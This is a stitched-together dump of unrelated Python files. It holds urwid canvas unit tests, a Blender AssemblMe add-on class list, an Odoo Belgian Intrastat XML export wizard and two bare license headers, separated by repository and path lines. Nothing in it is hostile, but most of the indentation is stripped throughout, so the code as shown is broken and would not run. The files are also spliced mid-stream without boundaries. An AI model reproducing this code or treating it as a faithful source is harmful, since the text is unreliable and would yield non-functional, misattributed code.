from urwid.compat import B
import urwid
class CanvasCacheTest(unittest.TestCase):
def setUp(self):
# purge the cache
urwid.CanvasCache._widgets.clear()
def cct(self, widget, size, focus, expected):
got = urwid.CanvasCache.fetch(widget, urwid.Widget, size, focus)
assert expected==got, "got: %s expected: %s"%(got, expected)
def test1(self):
a = urwid.Text("")
b = urwid.Text("")
blah = urwid.TextCanvas()
blah.finalize(a, (10,1), False)
blah2 = urwid.TextCanvas()
blah2.finalize(a, (15,1), False)
bloo = urwid.TextCanvas()
bloo.finalize(b, (20,2), True)
urwid.CanvasCache.store(urwid.Widget, blah)
urwid.CanvasCache.store(urwid.Widget, blah2)
urwid.CanvasCache.store(urwid.Widget, bloo)
self.cct(a, (10,1), False, blah)
self.cct(a, (15,1), False, blah2)
self.cct(a, (15,1), True, None)
self.cct(a, (10,2), False, None)
self.cct(b, (20,2), True, bloo)
self.cct(b, (21,2), True, None)
urwid.CanvasCache.invalidate(a)
self.cct(a, (10,1), False, None)
self.cct(a, (15,1), False, None)
self.cct(b, (20,2), True, bloo)
class CanvasTest(unittest.TestCase):
def ct(self, text, attr, exp_content):
c = urwid.TextCanvas([B(t) for t in text], attr)
content = list(c.content())
assert content == exp_content, "got: %r expected: %r" % (content,
exp_content)
def ct2(self, text, attr, left, top, cols, rows, def_attr, exp_content):
c = urwid.TextCanvas([B(t) for t in text], attr)
content = list(c.content(left, top, cols, rows, def_attr))
assert content == exp_content, "got: %r expected: %r" % (content,
exp_content)
def test1(self):
self.ct(["Hello world"], None, [[(None, None, B("Hello world"))]])
self.ct(["Hello world"], [[("a",5)]],
[[("a", None, B("Hello")), (None, None, B(" world"))]])
self.ct(["Hi","There"], None,
[[(None, None, B("Hi "))], [(None, None, B("There"))]])
def test2(self):
self.ct2(["Hello"], None, 0, 0, 5, 1, None,
[[(None, None, B("Hello"))]])
self.ct2(["Hello"], None, 1, 0, 4, 1, None,
[[(None, None, B("ello"))]])
self.ct2(["Hello"], None, 0, 0, 4, 1, None,
[[(None, None, B("Hell"))]])
self.ct2(["Hi","There"], None, 1, 0, 3, 2, None,
[[(None, None, B("i "))], [(None, None, B("her"))]])
self.ct2(["Hi","There"], None, 0, 0, 5, 1, None,
[[(None, None, B("Hi "))]])
self.ct2(["Hi","There"], None, 0, 1, 5, 1, None,
[[(None, None, B("There"))]])
class ShardBodyTest(unittest.TestCase):
def sbt(self, shards, shard_tail, expected):
result = canvas.shard_body(shards, shard_tail, False)
assert result == expected, "got: %r expected: %r" % (result, expected)
def sbttail(self, num_rows, sbody, expected):
result = canvas.shard_body_tail(num_rows, sbody)
assert result == expected, "got: %r expected: %r" % (result, expected)
def sbtrow(self, sbody, expected):
result = list(canvas.shard_body_row(sbody))
assert result == expected, "got: %r expected: %r" % (result, expected)
def test1(self):
cviews = [(0,0,10,5,None,"foo"),(0,0,5,5,None,"bar")]
self.sbt(cviews, [],
[(0, None, (0,0,10,5,None,"foo")),
(0, None, (0,0,5,5,None,"bar"))])
self.sbt(cviews, [(0, 3, None, (0,0,5,8,None,"baz"))],
[(3, None, (0,0,5,8,None,"baz")),
(0, None, (0,0,10,5,None,"foo")),
(0, None, (0,0,5,5,None,"bar"))])
self.sbt(cviews, [(10, 3, None, (0,0,5,8,None,"baz"))],
[(0, None, (0,0,10,5,None,"foo")),
(3, None, (0,0,5,8,None,"baz")),
(0, None, (0,0,5,5,None,"bar"))])
self.sbt(cviews, [(15, 3, None, (0,0,5,8,None,"baz"))],
[(0, None, (0,0,10,5,None,"foo")),
(0, None, (0,0,5,5,None,"bar")),
(3, None, (0,0,5,8,None,"baz"))])
def test2(self):
sbody = [(0, None, (0,0,10,5,None,"foo")),
(0, None, (0,0,5,5,None,"bar")),
(3, None, (0,0,5,8,None,"baz"))]
self.sbttail(5, sbody, [])
self.sbttail(3, sbody,
[(0, 3, None, (0,0,10,5,None,"foo")),
(0, 3, None, (0,0,5,5,None,"bar")),
(0, 6, None, (0,0,5,8,None,"baz"))])
sbody = [(0, None, (0,0,10,3,None,"foo")),
(0, None, (0,0,5,5,None,"bar")),
(3, None, (0,0,5,9,None,"baz"))]
self.sbttail(3, sbody,
[(10, 3, None, (0,0,5,5,None,"bar")),
(0, 6, None, (0,0,5,9,None,"baz"))])
def test3(self):
self.sbtrow([(0, None, (0,0,10,5,None,"foo")),
(0, None, (0,0,5,5,None,"bar")),
(3, None, (0,0,5,8,None,"baz"))],
[20])
self.sbtrow([(0, iter("foo"), (0,0,10,5,None,"foo")),
(0, iter("bar"), (0,0,5,5,None,"bar")),
(3, iter("zzz"), (0,0,5,8,None,"baz"))],
["f","b","z"])
class ShardsTrimTest(unittest.TestCase):
def sttop(self, shards, top, expected):
result = canvas.shards_trim_top(shards, top)
        assert result == expected, "got: %r expected: %r" % (result, expected)
def strows(self, shards, rows, expected):
result = canvas.shards_trim_rows(shards, rows)
        assert result == expected, "got: %r expected: %r" % (result, expected)
def stsides(self, shards, left, cols, expected):
result = canvas.shards_trim_sides(shards, left, cols)
        assert result == expected, "got: %r expected: %r" % (result, expected)
def test1(self):
shards = [(5, [(0,0,10,5,None,"foo"),(0,0,5,5,None,"bar")])]
self.sttop(shards, 2,
[(3, [(0,2,10,3,None,"foo"),(0,2,5,3,None,"bar")])])
self.strows(shards, 2,
[(2, [(0,0,10,2,None,"foo"),(0,0,5,2,None,"bar")])])
shards = [(5, [(0,0,10,5,None,"foo")]),(3,[(0,0,10,3,None,"bar")])]
self.sttop(shards, 2,
[(3, [(0,2,10,3,None,"foo")]),(3,[(0,0,10,3,None,"bar")])])
self.sttop(shards, 5,
[(3, [(0,0,10,3,None,"bar")])])
self.sttop(shards, 7,
[(1, [(0,2,10,1,None,"bar")])])
self.strows(shards, 7,
[(5, [(0,0,10,5,None,"foo")]),(2, [(0,0,10,2,None,"bar")])])
self.strows(shards, 5,
[(5, [(0,0,10,5,None,"foo")])])
self.strows(shards, 4,
[(4, [(0,0,10,4,None,"foo")])])
shards = [(5, [(0,0,10,5,None,"foo"), (0,0,5,8,None,"baz")]),
(3,[(0,0,10,3,None,"bar")])]
self.sttop(shards, 2,
[(3, [(0,2,10,3,None,"foo"), (0,2,5,6,None,"baz")]),
(3,[(0,0,10,3,None,"bar")])])
self.sttop(shards, 5,
[(3, [(0,0,10,3,None,"bar"), (0,5,5,3,None,"baz")])])
self.sttop(shards, 7,
[(1, [(0,2,10,1,None,"bar"), (0,7,5,1,None,"baz")])])
self.strows(shards, 7,
[(5, [(0,0,10,5,None,"foo"), (0,0,5,7,None,"baz")]),
(2, [(0,0,10,2,None,"bar")])])
self.strows(shards, 5,
[(5, [(0,0,10,5,None,"foo"), (0,0,5,5,None,"baz")])])
self.strows(shards, 4,
[(4, [(0,0,10,4,None,"foo"), (0,0,5,4,None,"baz")])])
def test2(self):
shards = [(5, [(0,0,10,5,None,"foo"),(0,0,5,5,None,"bar")])]
self.stsides(shards, 0, 15,
[(5, [(0,0,10,5,None,"foo"),(0,0,5,5,None,"bar")])])
self.stsides(shards, 6, 9,
[(5, [(6,0,4,5,None,"foo"),(0,0,5,5,None,"bar")])])
self.stsides(shards, 6, 6,
[(5, [(6,0,4,5,None,"foo"),(0,0,2,5,None,"bar")])])
self.stsides(shards, 0, 10,
[(5, [(0,0,10,5,None,"foo")])])
self.stsides(shards, 10, 5,
[(5, [(0,0,5,5,None,"bar")])])
self.stsides(shards, 1, 7,
[(5, [(1,0,7,5,None,"foo")])])
shards = [(5, [(0,0,10,5,None,"foo"), (0,0,5,8,None,"baz")]),
(3,[(0,0,10,3,None,"bar")])]
self.stsides(shards, 0, 15,
[(5, [(0,0,10,5,None,"foo"), (0,0,5,8,None,"baz")]),
(3,[(0,0,10,3,None,"bar")])])
self.stsides(shards, 2, 13,
[(5, [(2,0,8,5,None,"foo"), (0,0,5,8,None,"baz")]),
(3,[(2,0,8,3,None,"bar")])])
self.stsides(shards, 2, 10,
[(5, [(2,0,8,5,None,"foo"), (0,0,2,8,None,"baz")]),
(3,[(2,0,8,3,None,"bar")])])
self.stsides(shards, 2, 8,
[(5, [(2,0,8,5,None,"foo")]),
(3,[(2,0,8,3,None,"bar")])])
self.stsides(shards, 2, 6,
[(5, [(2,0,6,5,None,"foo")]),
(3,[(2,0,6,3,None,"bar")])])
self.stsides(shards, 10, 5,
[(8, [(0,0,5,8,None,"baz")])])
self.stsides(shards, 11, 3,
[(8, [(1,0,3,8,None,"baz")])])
class ShardsJoinTest(unittest.TestCase):
def sjt(self, shard_lists, expected):
result = canvas.shards_join(shard_lists)
        assert result == expected, "got: %r expected: %r" % (result, expected)
def test(self):
shards1 = [(5, [(0,0,10,5,None,"foo"), (0,0,5,8,None,"baz")]),
(3,[(0,0,10,3,None,"bar")])]
shards2 = [(3, [(0,0,10,3,None,"aaa")]),
(5,[(0,0,10,5,None,"bbb")])]
shards3 = [(3, [(0,0,10,3,None,"111")]),
(2,[(0,0,10,3,None,"222")]),
(3,[(0,0,10,3,None,"333")])]
self.sjt([shards1], shards1)
self.sjt([shards1, shards2],
[(3, [(0,0,10,5,None,"foo"), (0,0,5,8,None,"baz"),
(0,0,10,3,None,"aaa")]),
(2, [(0,0,10,5,None,"bbb")]),
(3, [(0,0,10,3,None,"bar")])])
self.sjt([shards1, shards3],
[(3, [(0,0,10,5,None,"foo"), (0,0,5,8,None,"baz"),
(0,0,10,3,None,"111")]),
(2, [(0,0,10,3,None,"222")]),
(3, [(0,0,10,3,None,"bar"), (0,0,10,3,None,"333")])])
self.sjt([shards1, shards2, shards3],
[(3, [(0,0,10,5,None,"foo"), (0,0,5,8,None,"baz"),
(0,0,10,3,None,"aaa"), (0,0,10,3,None,"111")]),
(2, [(0,0,10,5,None,"bbb"), (0,0,10,3,None,"222")]),
(3, [(0,0,10,3,None,"bar"), (0,0,10,3,None,"333")])])
class CanvasJoinTest(unittest.TestCase):
def cjtest(self, desc, l, expected):
l = [(c, None, False, n) for c, n in l]
result = list(urwid.CanvasJoin(l).content())
assert result == expected, "%s expected %r, got %r"%(
desc, expected, result)
def test(self):
C = urwid.TextCanvas
hello = C([B("hello")])
there = C([B("there")], [[("a",5)]])
a = C([B("a")])
hi = C([B("hi")])
how = C([B("how")], [[("a",1)]])
dy = C([B("dy")])
how_you = C([B("how"), B("you")])
self.cjtest("one", [(hello, 5)],
[[(None, None, B("hello"))]])
self.cjtest("two", [(hello, 5), (there, 5)],
[[(None, None, B("hello")), ("a", None, B("there"))]])
self.cjtest("two space", [(hello, 7), (there, 5)],
[[(None, None, B("hello")),(None,None,B(" ")),
("a", None, B("there"))]])
self.cjtest("three space", [(hi, 4), (how, 3), (dy, 2)],
[[(None, None, B("hi")),(None,None,B(" ")),("a",None, B("h")),
(None,None,B("ow")),(None,None,B("dy"))]])
self.cjtest("four space", [(a, 2), (hi, 3), (dy, 3), (a, 1)],
[[(None, None, B("a")),(None,None,B(" ")),
(None, None, B("hi")),(None,None,B(" ")),
(None, None, B("dy")),(None,None,B(" ")),
(None, None, B("a"))]])
self.cjtest("pile 2", [(how_you, 4), (hi, 2)],
[[(None, None, B('how')), (None, None, B(' ')),
(None, None, B('hi'))],
[(None, None, B('you')), (None, None, B(' ')),
(None, None, B(' '))]])
self.cjtest("pile 2r", [(hi, 4), (how_you, 3)],
[[(None, None, B('hi')), (None, None, B(' ')),
(None, None, B('how'))],
[(None, None, B(' ')),
(None, None, B('you'))]])
class CanvasOverlayTest(unittest.TestCase):
def cotest(self, desc, bgt, bga, fgt, fga, l, r, et):
bgt = B(bgt)
fgt = B(fgt)
bg = urwid.CompositeCanvas(
urwid.TextCanvas([bgt],[bga]))
fg = urwid.CompositeCanvas(
urwid.TextCanvas([fgt],[fga]))
bg.overlay(fg, l, 0)
result = list(bg.content())
assert result == et, "%s expected %r, got %r"%(
desc, et, result)
def test1(self):
self.cotest("left", "qxqxqxqx", [], "HI", [], 0, 6,
[[(None, None, B("HI")),(None,None,B("qxqxqx"))]])
self.cotest("right", "qxqxqxqx", [], "HI", [], 6, 0,
[[(None, None, B("qxqxqx")),(None,None,B("HI"))]])
self.cotest("center", "qxqxqxqx", [], "HI", [], 3, 3,
[[(None, None, B("qxq")),(None,None,B("HI")),
(None,None,B("xqx"))]])
self.cotest("center2", "qxqxqxqx", [], "HI ", [], 2, 2,
[[(None, None, B("qx")),(None,None,B("HI ")),
(None,None,B("qx"))]])
self.cotest("full", "rz", [], "HI", [], 0, 0,
[[(None, None, B("HI"))]])
def test2(self):
self.cotest("same","asdfghjkl",[('a',9)],"HI",[('a',2)],4,3,
[[('a',None,B("asdf")),('a',None,B("HI")),('a',None,B("jkl"))]])
self.cotest("diff","asdfghjkl",[('a',9)],"HI",[('b',2)],4,3,
[[('a',None,B("asdf")),('b',None,B("HI")),('a',None,B("jkl"))]])
self.cotest("None end","asdfghjkl",[('a',9)],"HI ",[('a',2)],
2,3,
[[('a',None,B("as")),('a',None,B("HI")),
(None,None,B(" ")),('a',None,B("jkl"))]])
self.cotest("float end","asdfghjkl",[('a',3)],"HI",[('a',2)],
4,3,
[[('a',None,B("asd")),(None,None,B("f")),
('a',None,B("HI")),(None,None,B("jkl"))]])
self.cotest("cover 2","asdfghjkl",[('a',5),('c',4)],"HI",
[('b',2)],4,3,
[[('a',None,B("asdf")),('b',None,B("HI")),('c',None,B("jkl"))]])
self.cotest("cover 2-2","asdfghjkl",
[('a',4),('d',1),('e',1),('c',3)],
"HI",[('b',2)], 4, 3,
[[('a',None,B("asdf")),('b',None,B("HI")),('c',None,B("jkl"))]])
def test3(self):
urwid.set_encoding("euc-jp")
self.cotest("db0","\xA1\xA1\xA1\xA1\xA1\xA1",[],"HI",[],2,2,
[[(None,None,B("\xA1\xA1")),(None,None,B("HI")),
(None,None,B("\xA1\xA1"))]])
self.cotest("db1","\xA1\xA1\xA1\xA1\xA1\xA1",[],"OHI",[],1,2,
[[(None,None,B(" ")),(None,None,B("OHI")),
(None,None,B("\xA1\xA1"))]])
self.cotest("db2","\xA1\xA1\xA1\xA1\xA1\xA1",[],"OHI",[],2,1,
[[(None,None,B("\xA1\xA1")),(None,None,B("OHI")),
(None,None,B(" "))]])
self.cotest("db3","\xA1\xA1\xA1\xA1\xA1\xA1",[],"OHIO",[],1,1,
[[(None,None,B(" ")),(None,None,B("OHIO")),(None,None,B(" "))]])
class CanvasPadTrimTest(unittest.TestCase):
def cptest(self, desc, ct, ca, l, r, et):
ct = B(ct)
c = urwid.CompositeCanvas(
urwid.TextCanvas([ct], [ca]))
c.pad_trim_left_right(l, r)
result = list(c.content())
assert result == et, "%s expected %r, got %r"%(
desc, et, result)
def test1(self):
self.cptest("none", "asdf", [], 0, 0,
[[(None,None,B("asdf"))]])
self.cptest("left pad", "asdf", [], 2, 0,
[[(None,None,B(" ")),(None,None,B("asdf"))]])
self.cptest("right pad", "asdf", [], 0, 2,
[[(None,None,B("asdf")),(None,None,B(" "))]])
def test2(self):
self.cptest("left trim", "asdf", [], -2, 0,
[[(None,None,B("df"))]])
self.cptest("right trim", "asdf", [], 0, -2,
[[(None,None,B("as"))]])
|
feureau/Small-Scripts | refs/heads/master | Blender/Blender config/2.91/scripts/addons/assemblme_v1-4-0/lib/classes_to_register.py | 1 | """
Copyright (C) 2017 Bricks Brought to Life
http://bblanimation.com/
chris@bblanimation.com
Created by Christopher Gearhart
"""
# Module imports
from .preferences import *
from .report_error import *
from .property_groups import *
from ..ui import *
from ..operators import *
from .. import addon_updater_ops
classes = [
# assemblme/operators
create_build_animation.ASSEMBLME_OT_create_build_animation,
info_restore_preset.ASSEMBLME_OT_info_restore_preset,
new_group_from_selection.ASSEMBLME_OT_new_group_from_selection,
presets.ASSEMBLME_OT_anim_presets,
refresh_build_animation_length.ASSEMBLME_OT_refresh_anim_length,
start_over.ASSEMBLME_OT_start_over,
visualizer.ASSEMBLME_OT_visualizer,
aglist_actions.AGLIST_OT_list_action,
aglist_actions.AGLIST_OT_copy_settings_to_others,
aglist_actions.AGLIST_OT_copy_settings,
aglist_actions.AGLIST_OT_paste_settings,
aglist_actions.AGLIST_OT_set_to_active,
aglist_actions.AGLIST_OT_print_all_items,
aglist_actions.AGLIST_OT_clear_all_items,
# assemblme/ui
ASSEMBLME_MT_copy_paste_menu,
ASSEMBLME_PT_animations,
ASSEMBLME_PT_actions,
ASSEMBLME_PT_settings,
ASSEMBLME_PT_visualizer_settings,
ASSEMBLME_PT_preset_manager,
ASSEMBLME_UL_items,
# assemblme/lib
ASSEMBLME_PT_preferences,
SCENE_OT_report_error,
SCENE_OT_close_report_error,
AnimatedCollectionProperties,
AssemblMeProperties,
]
|
takis/odoo | refs/heads/8.0 | addons/l10n_be_intrastat/wizard/xml_decl.py | 205 | # -*- encoding: utf-8 -*-
##############################################################################
#
# Odoo, Open Source Business Applications
# Copyright (C) 2014-2015 Odoo S.A. <http://www.odoo.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import base64
import xml.etree.ElementTree as ET
from collections import namedtuple
from datetime import datetime
from openerp import exceptions, SUPERUSER_ID, tools
from openerp.osv import fields, osv
from openerp.tools.translate import _
INTRASTAT_XMLNS = 'http://www.onegate.eu/2010-01-01'
class xml_decl(osv.TransientModel):
"""
Intrastat XML Declaration
"""
_name = "l10n_be_intrastat_xml.xml_decl"
_description = 'Intrastat XML Declaration'
def _get_tax_code(self, cr, uid, context=None):
obj_tax_code = self.pool.get('account.tax.code')
obj_user = self.pool.get('res.users')
company_id = obj_user.browse(cr, uid, uid, context=context).company_id.id
tax_code_ids = obj_tax_code.search(cr, uid, [('company_id', '=', company_id),
('parent_id', '=', False)],
context=context)
return tax_code_ids and tax_code_ids[0] or False
def _get_def_monthyear(self, cr, uid, context=None):
td = datetime.strptime(fields.date.context_today(self, cr, uid, context=context),
tools.DEFAULT_SERVER_DATE_FORMAT).date()
return td.strftime('%Y'), td.strftime('%m')
def _get_def_month(self, cr, uid, context=None):
return self._get_def_monthyear(cr, uid, context=context)[1]
def _get_def_year(self, cr, uid, context=None):
return self._get_def_monthyear(cr, uid, context=context)[0]
_columns = {
'name': fields.char('File Name'),
'month': fields.selection([('01','January'), ('02','February'), ('03','March'),
('04','April'), ('05','May'), ('06','June'), ('07','July'),
('08','August'), ('09','September'), ('10','October'),
('11','November'), ('12','December')], 'Month', required=True),
'year': fields.char('Year', size=4, required=True),
'tax_code_id': fields.many2one('account.tax.code', 'Company Tax Chart',
domain=[('parent_id', '=', False)], required=True),
'arrivals': fields.selection([('be-exempt', 'Exempt'),
('be-standard', 'Standard'),
('be-extended', 'Extended')],
'Arrivals', required=True),
'dispatches': fields.selection([('be-exempt', 'Exempt'),
('be-standard', 'Standard'),
('be-extended', 'Extended')],
'Dispatches', required=True),
'file_save': fields.binary('Intrastat Report File', readonly=True),
'state': fields.selection([('draft', 'Draft'), ('download', 'Download')], string="State"),
}
_defaults = {
'arrivals': 'be-standard',
'dispatches': 'be-standard',
'name': 'intrastat.xml',
'tax_code_id': _get_tax_code,
'month': _get_def_month,
'year': _get_def_year,
'state': 'draft',
}
def _company_warning(self, cr, uid, translated_msg, context=None):
""" Raise a error with custom message, asking user to configure company settings """
xmlid_mod = self.pool['ir.model.data']
action_id = xmlid_mod.xmlid_to_res_id(cr, uid, 'base.action_res_company_form')
raise exceptions.RedirectWarning(
translated_msg, action_id, _('Go to company configuration screen'))
def create_xml(self, cr, uid, ids, context=None):
"""Creates xml that is to be exported and sent to estate for partner vat intra.
:return: Value for next action.
:rtype: dict
"""
decl_datas = self.browse(cr, uid, ids[0])
company = decl_datas.tax_code_id.company_id
if not (company.partner_id and company.partner_id.country_id and
company.partner_id.country_id.id):
self._company_warning(
cr, uid,
_('The country of your company is not set, '
'please make sure to configure it first.'),
context=context)
kbo = company.company_registry
if not kbo:
self._company_warning(
cr, uid,
_('The registry number of your company is not set, '
'please make sure to configure it first.'),
context=context)
if len(decl_datas.year) != 4:
            raise exceptions.Warning(_('Year must be a 4-digit number (YYYY)'))
#Create root declaration
decl = ET.Element('DeclarationReport')
decl.set('xmlns', INTRASTAT_XMLNS)
#Add Administration elements
admin = ET.SubElement(decl, 'Administration')
fromtag = ET.SubElement(admin, 'From')
fromtag.text = kbo
fromtag.set('declarerType', 'KBO')
ET.SubElement(admin, 'To').text = "NBB"
ET.SubElement(admin, 'Domain').text = "SXX"
if decl_datas.arrivals == 'be-standard':
decl.append(self._get_lines(cr, SUPERUSER_ID, ids, decl_datas, company,
dispatchmode=False, extendedmode=False, context=context))
elif decl_datas.arrivals == 'be-extended':
decl.append(self._get_lines(cr, SUPERUSER_ID, ids, decl_datas, company,
dispatchmode=False, extendedmode=True, context=context))
if decl_datas.dispatches == 'be-standard':
decl.append(self._get_lines(cr, SUPERUSER_ID, ids, decl_datas, company,
dispatchmode=True, extendedmode=False, context=context))
elif decl_datas.dispatches == 'be-extended':
decl.append(self._get_lines(cr, SUPERUSER_ID, ids, decl_datas, company,
dispatchmode=True, extendedmode=True, context=context))
#Get xml string with declaration
data_file = ET.tostring(decl, encoding='UTF-8', method='xml')
#change state of the wizard
self.write(cr, uid, ids,
{'name': 'intrastat_%s%s.xml' % (decl_datas.year, decl_datas.month),
'file_save': base64.encodestring(data_file),
'state': 'download'},
context=context)
return {
'name': _('Save'),
'context': context,
'view_type': 'form',
'view_mode': 'form',
'res_model': 'l10n_be_intrastat_xml.xml_decl',
'type': 'ir.actions.act_window',
'target': 'new',
'res_id': ids[0],
}
def _get_lines(self, cr, uid, ids, decl_datas, company, dispatchmode=False,
extendedmode=False, context=None):
intrastatcode_mod = self.pool['report.intrastat.code']
invoiceline_mod = self.pool['account.invoice.line']
product_mod = self.pool['product.product']
region_mod = self.pool['l10n_be_intrastat.region']
warehouse_mod = self.pool['stock.warehouse']
if dispatchmode:
mode1 = 'out_invoice'
mode2 = 'in_refund'
declcode = "29"
else:
mode1 = 'in_invoice'
mode2 = 'out_refund'
declcode = "19"
decl = ET.Element('Report')
if not extendedmode:
decl.set('code', 'EX%sS' % declcode)
else:
decl.set('code', 'EX%sE' % declcode)
decl.set('date', '%s-%s' % (decl_datas.year, decl_datas.month))
datas = ET.SubElement(decl, 'Data')
if not extendedmode:
datas.set('form', 'EXF%sS' % declcode)
else:
datas.set('form', 'EXF%sE' % declcode)
datas.set('close', 'true')
intrastatkey = namedtuple("intrastatkey",
['EXTRF', 'EXCNT', 'EXTTA', 'EXREG',
'EXGO', 'EXTPC', 'EXDELTRM'])
entries = {}
sqlreq = """
select
inv_line.id
from
account_invoice_line inv_line
join account_invoice inv on inv_line.invoice_id=inv.id
left join res_country on res_country.id = inv.intrastat_country_id
left join res_partner on res_partner.id = inv.partner_id
left join res_country countrypartner on countrypartner.id = res_partner.country_id
join product_product on inv_line.product_id=product_product.id
join product_template on product_product.product_tmpl_id=product_template.id
where
inv.state in ('open','paid')
and inv.company_id=%s
and not product_template.type='service'
and (res_country.intrastat=true or (inv.intrastat_country_id is null
and countrypartner.intrastat=true))
and ((res_country.code is not null and not res_country.code=%s)
or (res_country.code is null and countrypartner.code is not null
and not countrypartner.code=%s))
and inv.type in (%s, %s)
and to_char(inv.date_invoice, 'YYYY')=%s
and to_char(inv.date_invoice, 'MM')=%s
"""
cr.execute(sqlreq, (company.id, company.partner_id.country_id.code,
company.partner_id.country_id.code, mode1, mode2,
decl_datas.year, decl_datas.month))
lines = cr.fetchall()
invoicelines_ids = [rec[0] for rec in lines]
invoicelines = invoiceline_mod.browse(cr, uid, invoicelines_ids, context=context)
for inv_line in invoicelines:
#Check type of transaction
if inv_line.invoice_id.intrastat_transaction_id:
extta = inv_line.invoice_id.intrastat_transaction_id.code
else:
extta = "1"
#Check country
if inv_line.invoice_id.intrastat_country_id:
excnt = inv_line.invoice_id.intrastat_country_id.code
else:
excnt = inv_line.invoice_id.partner_id.country_id.code
            #Check region
            #If purchase: comes from a purchase order, linked to a location,
            #which is linked to the warehouse
            #If sale: the sale order is linked to the warehouse, or it comes
            #from a delivery order, linked to a location, which is linked
            #to the warehouse
            #If none found, use the company's region.
exreg = None
if inv_line.invoice_id.type in ('in_invoice', 'in_refund'):
#comes from purchase
POL = self.pool['purchase.order.line']
poline_ids = POL.search(
cr, uid, [('invoice_lines', 'in', inv_line.id)], context=context)
if poline_ids:
purchaseorder = POL.browse(cr, uid, poline_ids[0], context=context).order_id
region_id = warehouse_mod.get_regionid_from_locationid(
cr, uid, purchaseorder.location_id.id, context=context)
if region_id:
exreg = region_mod.browse(cr, uid, region_id).code
elif inv_line.invoice_id.type in ('out_invoice', 'out_refund'):
#comes from sales
soline_ids = self.pool['sale.order.line'].search(
cr, uid, [('invoice_lines', 'in', inv_line.id)], context=context)
if soline_ids:
saleorder = self.pool['sale.order.line'].browse(
cr, uid, soline_ids[0], context=context).order_id
if saleorder and saleorder.warehouse_id and saleorder.warehouse_id.region_id:
exreg = region_mod.browse(
cr, uid, saleorder.warehouse_id.region_id.id, context=context).code
if not exreg:
if company.region_id:
exreg = company.region_id.code
else:
self._company_warning(
cr, uid,
_('The Intrastat Region of the selected company is not set, '
'please make sure to configure it first.'),
context=context)
#Check commodity codes
intrastat_id = product_mod.get_intrastat_recursively(
cr, uid, inv_line.product_id.id, context=context)
if intrastat_id:
exgo = intrastatcode_mod.browse(cr, uid, intrastat_id, context=context).name
else:
raise exceptions.Warning(
_('Product "%s" has no intrastat code, please configure it') %
inv_line.product_id.display_name)
#In extended mode, 2 more fields required
if extendedmode:
#Check means of transport
if inv_line.invoice_id.transport_mode_id:
extpc = inv_line.invoice_id.transport_mode_id.code
elif company.transport_mode_id:
extpc = company.transport_mode_id.code
else:
self._company_warning(
cr, uid,
_('The default Intrastat transport mode of your company '
'is not set, please make sure to configure it first.'),
context=context)
#Check incoterm
if inv_line.invoice_id.incoterm_id:
exdeltrm = inv_line.invoice_id.incoterm_id.code
elif company.incoterm_id:
exdeltrm = company.incoterm_id.code
else:
self._company_warning(
cr, uid,
_('The default Incoterm of your company is not set, '
'please make sure to configure it first.'),
context=context)
else:
extpc = ""
exdeltrm = ""
linekey = intrastatkey(EXTRF=declcode, EXCNT=excnt,
EXTTA=extta, EXREG=exreg, EXGO=exgo,
EXTPC=extpc, EXDELTRM=exdeltrm)
#We have the key
#calculate amounts
if inv_line.price_unit and inv_line.quantity:
amount = inv_line.price_unit * inv_line.quantity
else:
amount = 0
if (not inv_line.uos_id.category_id
or not inv_line.product_id.uom_id.category_id
or inv_line.uos_id.category_id.id != inv_line.product_id.uom_id.category_id.id):
weight = inv_line.product_id.weight_net * inv_line.quantity
else:
weight = (inv_line.product_id.weight_net *
inv_line.quantity * inv_line.uos_id.factor)
if (not inv_line.uos_id.category_id or not inv_line.product_id.uom_id.category_id
or inv_line.uos_id.category_id.id != inv_line.product_id.uom_id.category_id.id):
supply_units = inv_line.quantity
else:
supply_units = inv_line.quantity * inv_line.uos_id.factor
amounts = entries.setdefault(linekey, (0, 0, 0))
amounts = (amounts[0] + amount, amounts[1] + weight, amounts[2] + supply_units)
entries[linekey] = amounts
numlgn = 0
for linekey in entries:
numlgn += 1
amounts = entries[linekey]
item = ET.SubElement(datas, 'Item')
self._set_Dim(item, 'EXSEQCODE', unicode(numlgn))
self._set_Dim(item, 'EXTRF', unicode(linekey.EXTRF))
self._set_Dim(item, 'EXCNT', unicode(linekey.EXCNT))
self._set_Dim(item, 'EXTTA', unicode(linekey.EXTTA))
self._set_Dim(item, 'EXREG', unicode(linekey.EXREG))
self._set_Dim(item, 'EXTGO', unicode(linekey.EXGO))
if extendedmode:
self._set_Dim(item, 'EXTPC', unicode(linekey.EXTPC))
self._set_Dim(item, 'EXDELTRM', unicode(linekey.EXDELTRM))
self._set_Dim(item, 'EXTXVAL', unicode(round(amounts[0], 0)).replace(".", ","))
self._set_Dim(item, 'EXWEIGHT', unicode(round(amounts[1], 0)).replace(".", ","))
self._set_Dim(item, 'EXUNITS', unicode(round(amounts[2], 0)).replace(".", ","))
if numlgn == 0:
            #no data
datas.set('action', 'nihil')
return decl
def _set_Dim(self, item, prop, value):
dim = ET.SubElement(item, 'Dim')
dim.set('prop', prop)
dim.text = value
|
virtualopensystems/neutron | refs/heads/master | neutron/tests/unit/services/firewall/agents/varmour/__init__.py | 140 | # Copyright 2013 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
|
flyapen/UgFlu | refs/heads/master | flumotion/test/test_common_xmlwriter.py | 3 | # -*- Mode: Python; test-case-name: flumotion.test.test_common_componentui -*-
# vi:si:et:sw=4:sts=4:ts=4
#
# Flumotion - a streaming media server
# Copyright (C) 2008 Fluendo, S.L. (www.fluendo.com).
# All rights reserved.
# This file may be distributed and/or modified under the terms of
# the GNU General Public License version 2 as published by
# the Free Software Foundation.
# This file is distributed without any warranty; without even the implied
# warranty of merchantability or fitness for a particular purpose.
# See "LICENSE.GPL" in the source distribution for more information.
# Licensees having purchased or holding a valid Flumotion Advanced
# Streaming Server license may use this file in accordance with the
# Flumotion Advanced Streaming Server Commercial License Agreement.
